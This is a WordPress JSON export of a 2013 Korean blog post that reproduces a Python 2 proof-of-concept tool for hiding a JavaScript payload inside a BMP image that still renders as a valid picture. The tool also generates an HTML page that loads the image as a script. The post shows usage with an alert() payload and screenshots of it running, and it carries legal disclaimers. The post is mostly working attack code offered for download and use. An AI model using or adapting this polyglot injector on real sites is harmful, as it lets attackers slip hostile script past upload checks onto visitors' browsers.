{"id":3999,"date":"2013-11-09T11:16:50","date_gmt":"2013-11-09T02:16:50","guid":{"rendered":"http:\/\/apollo89.com\/wordpress\/?p=3999"},"modified":"2013-11-12T16:58:08","modified_gmt":"2013-11-12T07:58:08","slug":"bmp-%ec%9d%b4%eb%af%b8%ec%a7%80%ec%95%88%ec%97%90-%ec%8a%a4%ed%81%ac%eb%a6%bd%ed%81%ac-%ec%82%bd%ec%9e%85","status":"publish","type":"post","link":"https:\/\/apollo89.com\/wordpress\/?p=3999","title":{"rendered":"[Python] BMP \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785(bmp script injection)"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p><strong>Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4.<br \/>\n\uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4.<br \/>\n<\/strong><\/p>\n<p>bmp \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785<\/p>\n<pre class=\"lang:python decode:true \" >#!\/usr\/bin\/env python2\r\n#==============================================================================#\r\n#======= Simply injects a JavaScript Payload into a BMP. ===========================#\r\n#======= The resulting BMP must be a valid (not corrupted) BMP. ====================#\r\n#======= Author: marcoramilli.blogspot.com =======================================#\r\n#======= Version: PoC (don't even think to use it in development env.) ================#\r\n#======= Disclaimer: ============================================================#\r\n#THIS SOFTWARE IS PROVIDED BY THE AUTHOR \"AS IS\" AND ANY EXPRESS OR\r\n#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\r\n#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\r\n#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,\r\n#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\r\n#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\r\n#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\r\n#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\r\n#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING\r\n#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\r\n#POSSIBILITY OF SUCH DAMAGE.\r\n#==============================================================================#\r\nimport argparse\r\nimport os\r\n \r\n#---------------------------------------------------------\r\ndef _hexify(num):\r\n    \"\"\"\r\n    Converts and formats to hexadecimal\r\n    \"\"\"\r\n    num = \"%x\" % num\r\n    if len(num) % 2:\r\n        num = '0'+num\r\n    return num.decode('hex')\r\n \r\n#---------------------------------------------------------\r\n#Example payload: \"var _0xe428=[\\\"\"+ b'\\x48\\x65\\x6C\\x6C\\x6F\\x20\\x57\\x6F\\x72\\x6C\\x64' + \"\\\"]\r\n#;alert(_0xe428[0]);\"\r\ndef _generate_and_write_to_file(payload, fname):\r\n    \"\"\"\r\n    Generates a fake but valid BMP within scriting\r\n    \"\"\"\r\n    f = open(fname, \"wb\")\r\n    header = (b'\\x42\\x4D'  #Signature BM\r\n              b'\\x2F\\x2A\\x00\\x00' #Header File size, but encoded as \/* &lt;-- Yes it's a valid header\r\n              b'\\x00\\x00\\x00\\x00' #Reserved\r\n              b'\\x00\\x00\\x00\\x00' #bitmap data offset\r\n              b''+ _hexify( len(payload) ) + #bitmap header size\r\n              b'\\x00\\x00\\x00\\x14' #width 20pixel .. it's up to you\r\n              b'\\x00\\x00\\x00\\x14' #height 20pixel .. it's up to you\r\n              b'\\x00\\x00' #nb_plan \r\n              b'\\x00\\x00' #nb per pixel\r\n              b'\\x00\\x10\\x00\\x00' #compression type\r\n              b'\\x00\\x00\\x00\\x00' #image size .. its ignored\r\n              b'\\x00\\x00\\x00\\x01' #Horizontal resolution\r\n              b'\\x00\\x00\\x00\\x01' #Vertial resolution\r\n              b'\\x00\\x00\\x00\\x00' #number of colors\r\n              b'\\x00\\x00\\x00\\x00' #number important colors\r\n              b'\\x00\\x00\\x00\\x80' #palet colors to be complient\r\n              b'\\x00\\x80\\xff\\x80' #palet colors to be complient\r\n              b'\\x80\\x00\\xff\\x2A' #palet colors to be complient\r\n              b'\\x2F\\x3D\\x31\\x3B' #*\/=1;\r\n             )\r\n    # I made this explicit, step by step .\r\n    f.write(header)\r\n    f.write(payload)\r\n    f.close()\r\n    return True\r\n \r\n#---------------------------------------------------------\r\ndef _generate_launching_page(f):\r\n    \"\"\"\r\n    Creates the HTML launching page\r\n    \"\"\"\r\n \r\n    htmlpage =\"\"\"\r\n                 &lt;html&gt;\r\n                 &lt;head&gt;&lt;title&gt;Opening an image&lt;\/title&gt; &lt;\/head&gt;\r\n                 &lt;body&gt;\r\n                      &lt;img src=\\\"\"\"\" + f + \"\"\"\\\"\\&gt;\r\n                      &lt;script src= \\\"\"\"\" + f + \"\"\"\\\"&gt; &lt;\/script&gt;\r\n                 &lt;\/body&gt;\r\n                 &lt;\/html&gt;\r\n              \"\"\"\r\n    html = open(\"run.html\", \"wb\")\r\n    html.write(htmlpage);\r\n    html.close()\r\n    return True\r\n \r\n#---------------------------------------------------------\r\ndef _inject_into_file(payload, fname):\r\n    \"\"\"\r\n    Injects the payload into existing BMP\r\n    NOTE: if the BMP contains \\xFF\\x2A might caouse issues\r\n    \"\"\"\r\n    # I know, I can do it all in memory and much more fast.\r\n    # I wont do it here.\r\n    f = open(fname, \"r+b\")\r\n    b = f.read()\r\n    b.replace(b'\\x2A\\x2F',b'\\x00\\x00')\r\n    f.close()\r\n \r\n    f = open(fname, \"w+b\")\r\n    f.write(b)\r\n    f.seek(2,0)\r\n    f.write(b'\\x2F\\x2A')\r\n    f.close()\r\n \r\n    f = open(fname, \"a+b\")\r\n    f.write(b'\\xFF\\x2A\\x2F\\x3D\\x31\\x3B')\r\n    f.write(payload)\r\n    f.close()\r\n    return True\r\n \r\n \r\n#---------------------------------------------------------\r\nif __name__ == \"__main__\":\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument(\"filename\",help=\"the bmp file name to be generated\/or infected\")\r\n    parser.add_argument(\"js_payload\",help=\"the payload to be injected. For exmample: \\\"alert(\\\"test\\\");\\\"\")\r\n    parser.add_argument(\"-i\", \"--inject-to-existing-bmp\", action=\"store_true\", help=\"inject into the current bitmap\")\r\n    args = parser.parse_args()\r\n    print(\"\"\"\r\n                |======================================================================================================|\r\n                | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.      |\r\n                | It is the end user's responsibility to obey all applicable local, state and federal laws.        |\r\n                | Authors assume no liability and are not responsible for any misuse or damage caused by this program  |\r\n                |======================================================================================================|\r\n            \"\"\")\r\n    if args.inject_to_existing_bmp:\r\n         _inject_into_file(args.js_payload, args.filename)\r\n    else:\r\n        _generate_and_write_to_file(args.js_payload, args.filename)\r\n       \r\n    _generate_launching_page(args.filename)\r\n    print \"[+] Finished!\"<\/pre>\n<p>\uc0ac\uc6a9\ubc95<\/p>\n<pre class=\"lang:default decode:true \" >bmp_script_injection.py -i test.bmp \"alert('bmp script injection test');\"<\/pre>\n<p>\uba3c\uc800 \uc0dd\uc131\ub41c run.html \uc18c\uc2a4\ub97c \ubcf4\uba74, script\uc5d0 bmp \uc774\ubbf8\uc9c0\ub97c \uc900 \uac83\uc744 \ubcfc \uc218 \uc788\ub2e4..<br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection1.png\" alt=\"bmp_script_injection1\" width=\"481\" height=\"250\" class=\"alignnone size-full wp-image-4149\" srcset=\"https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection1.png 481w, https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection1-300x155.png 300w\" sizes=\"auto, (max-width: 481px) 100vw, 481px\" \/><\/p>\n<p>\uadf8\ub9ac\uace0 run.html \uc744 \uc2e4\ud589\ud574\ubcf4\uba74, script \uac00 \ub3d9\uc791\ud558\ub294 \uac83\uc744 \ubcfc \uc218 \uc788\ub2e4.(\uc774\ubbf8\uc9c0\ub3c4 \uc815\uc0c1\uc801\uc73c\ub85c \ub098\uc628\ub2e4.)<br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection2.png\" alt=\"bmp_script_injection2\" width=\"689\" height=\"690\" class=\"alignnone size-full wp-image-4150\" srcset=\"https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection2.png 689w, https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection2-150x150.png 150w, https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection2-300x300.png 300w\" sizes=\"auto, (max-width: 689px) 100vw, 689px\" \/><\/p>\n<p>\uadf8\ub798\uc11c Hex Editer \uc73c\ub85c \ubcf4\ub2c8, \ub9c8\uc9c0\ub9c9\ubd80\ubd84\uc5d0 injection \ud55c script \ub97c \ubcfc \uc218 \uc788\uc5c8\ub2e4.<br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection3.png\" alt=\"bmp_script_injection3\" width=\"563\" height=\"264\" class=\"alignnone size-full wp-image-4151\" srcset=\"https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection3.png 563w, https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection3-300x140.png 300w\" sizes=\"auto, (max-width: 563px) 100vw, 563px\" \/><\/p>\n<p>\ucc38\uace0 : <a href=\"http:\/\/marcoramilli.blogspot.com.es\/2013\/10\/hacking-through-images.html?m=1\" target=\"_blank\">http:\/\/marcoramilli.blogspot.com.es\/2013\/10\/hacking-through-images.html?m=1<\/a><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4. \uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4. bmp \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785 #!\/usr\/bin\/env python2 #==============================================================================# #======= Simply injects a JavaScript Payload into &hellip; <a href=\"https:\/\/apollo89.com\/wordpress\/?p=3999\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[663],"tags":[1245,1246,1247],"class_list":["post-3999","post","type-post","status-publish","format-standard","hentry","category-python-","tag-bmp","tag-image","tag-script-injection"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>[Python] BMP \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785(bmp script injection) - Apollo89.com<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/apollo89.com\/wordpress\/?p=3999\" \/>\n<meta property=\"og:locale\" content=\"ko_KR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[Python] BMP \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785(bmp script injection) - Apollo89.com\" \/>\n<meta property=\"og:description\" content=\"&nbsp; Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4. \uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4. bmp \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785 #!\/usr\/bin\/env python2 #==============================================================================# #======= Simply injects a JavaScript Payload into &hellip; Continue reading &rarr;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/apollo89.com\/wordpress\/?p=3999\" \/>\n<meta property=\"og:site_name\" content=\"Apollo89.com\" \/>\n<meta property=\"article:published_time\" content=\"2013-11-09T02:16:50+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2013-11-12T07:58:08+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection1.png\" \/>\n<meta name=\"author\" content=\"apollo89\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\uae00\uc4f4\uc774\" \/>\n\t<meta name=\"twitter:data1\" content=\"apollo89\" \/>\n\t<meta name=\"twitter:label2\" content=\"\uc608\uc0c1 \ub418\ub294 \ud310\ub3c5 \uc2dc\uac04\" \/>\n\t<meta name=\"twitter:data2\" content=\"4\ubd84\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999\"},\"author\":{\"name\":\"apollo89\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#\\\/schema\\\/person\\\/93f56825cac3b2f18e5f107995066c82\"},\"headline\":\"[Python] BMP \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785(bmp script injection)\",\"datePublished\":\"2013-11-09T02:16:50+00:00\",\"dateModified\":\"2013-11-12T07:58:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999\"},\"wordCount\":28,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/10\\\/bmp_script_injection1.png\",\"keywords\":[\"bmp\",\"image\",\"script injection\"],\"articleSection\":[\"Python\\\/Ruby\\\/Perl\"],\"inLanguage\":\"ko-KR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999\",\"name\":\"[Python] BMP \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785(bmp script injection) - Apollo89.com\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/10\\\/bmp_script_injection1.png\",\"datePublished\":\"2013-11-09T02:16:50+00:00\",\"dateModified\":\"2013-11-12T07:58:08+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#\\\/schema\\\/person\\\/93f56825cac3b2f18e5f107995066c82\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999#breadcrumb\"},\"inLanguage\":\"ko-KR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ko-KR\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999#primaryimage\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/10\\\/bmp_script_injection1.png\",\"contentUrl\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/10\\\/bmp_script_injection1.png\",\"width\":481,\"height\":250},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3999#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\ud648\",\"item\":\"https:\\\/\\\/apollo89.com\\\/wordpress\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[Python] BMP \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785(bmp script injection)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#website\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/\",\"name\":\"Apollo89.com\",\"description\":\"\uc544\ud3f4\ub85c\uc528\uc758 \uc7a1\ub2e4\ud55c \uacbd\ud5d8\ub4e4..\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ko-KR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#\\\/schema\\\/person\\\/93f56825cac3b2f18e5f107995066c82\",\"name\":\"apollo89\",\"description\":\"\uc544\ud3f4\ub85c89 \uc785\ub2c8\ub2e4.\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[Python] BMP \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785(bmp script injection) - Apollo89.com","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/apollo89.com\/wordpress\/?p=3999","og_locale":"ko_KR","og_type":"article","og_title":"[Python] BMP \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785(bmp script injection) - Apollo89.com","og_description":"&nbsp; Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4. \uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4. bmp \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785 #!\/usr\/bin\/env python2 #==============================================================================# #======= Simply injects a JavaScript Payload into &hellip; Continue reading &rarr;","og_url":"https:\/\/apollo89.com\/wordpress\/?p=3999","og_site_name":"Apollo89.com","article_published_time":"2013-11-09T02:16:50+00:00","article_modified_time":"2013-11-12T07:58:08+00:00","og_image":[{"url":"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection1.png","type":"","width":"","height":""}],"author":"apollo89","twitter_card":"summary_large_image","twitter_misc":{"\uae00\uc4f4\uc774":"apollo89","\uc608\uc0c1 \ub418\ub294 \ud310\ub3c5 \uc2dc\uac04":"4\ubd84"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/apollo89.com\/wordpress\/?p=3999#article","isPartOf":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3999"},"author":{"name":"apollo89","@id":"https:\/\/apollo89.com\/wordpress\/#\/schema\/person\/93f56825cac3b2f18e5f107995066c82"},"headline":"[Python] BMP \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785(bmp script injection)","datePublished":"2013-11-09T02:16:50+00:00","dateModified":"2013-11-12T07:58:08+00:00","mainEntityOfPage":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3999"},"wordCount":28,"commentCount":0,"image":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3999#primaryimage"},"thumbnailUrl":"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection1.png","keywords":["bmp","image","script injection"],"articleSection":["Python\/Ruby\/Perl"],"inLanguage":"ko-KR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/apollo89.com\/wordpress\/?p=3999#respond"]}]},{"@type":"WebPage","@id":"https:\/\/apollo89.com\/wordpress\/?p=3999","url":"https:\/\/apollo89.com\/wordpress\/?p=3999","name":"[Python] BMP \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785(bmp script injection) - Apollo89.com","isPartOf":{"@id":"https:\/\/apollo89.com\/wordpress\/#website"},"primaryImageOfPage":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3999#primaryimage"},"image":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3999#primaryimage"},"thumbnailUrl":"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection1.png","datePublished":"2013-11-09T02:16:50+00:00","dateModified":"2013-11-12T07:58:08+00:00","author":{"@id":"https:\/\/apollo89.com\/wordpress\/#\/schema\/person\/93f56825cac3b2f18e5f107995066c82"},"breadcrumb":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3999#breadcrumb"},"inLanguage":"ko-KR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/apollo89.com\/wordpress\/?p=3999"]}]},{"@type":"ImageObject","inLanguage":"ko-KR","@id":"https:\/\/apollo89.com\/wordpress\/?p=3999#primaryimage","url":"https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection1.png","contentUrl":"https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/10\/bmp_script_injection1.png","width":481,"height":250},{"@type":"BreadcrumbList","@id":"https:\/\/apollo89.com\/wordpress\/?p=3999#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\ud648","item":"https:\/\/apollo89.com\/wordpress"},{"@type":"ListItem","position":2,"name":"[Python] BMP \uc774\ubbf8\uc9c0\uc548\uc5d0 \uc2a4\ud06c\ub9bd\ud06c \uc0bd\uc785(bmp script injection)"}]},{"@type":"WebSite","@id":"https:\/\/apollo89.com\/wordpress\/#website","url":"https:\/\/apollo89.com\/wordpress\/","name":"Apollo89.com","description":"\uc544\ud3f4\ub85c\uc528\uc758 \uc7a1\ub2e4\ud55c \uacbd\ud5d8\ub4e4..","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/apollo89.com\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ko-KR"},{"@type":"Person","@id":"https:\/\/apollo89.com\/wordpress\/#\/schema\/person\/93f56825cac3b2f18e5f107995066c82","name":"apollo89","description":"\uc544\ud3f4\ub85c89 \uc785\ub2c8\ub2e4.","url":"https:\/\/apollo89.com\/wordpress\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/3999","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3999"}],"version-history":[{"count":0,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/3999\/revisions"}],"wp:attachment":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3999"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3999"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3999"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}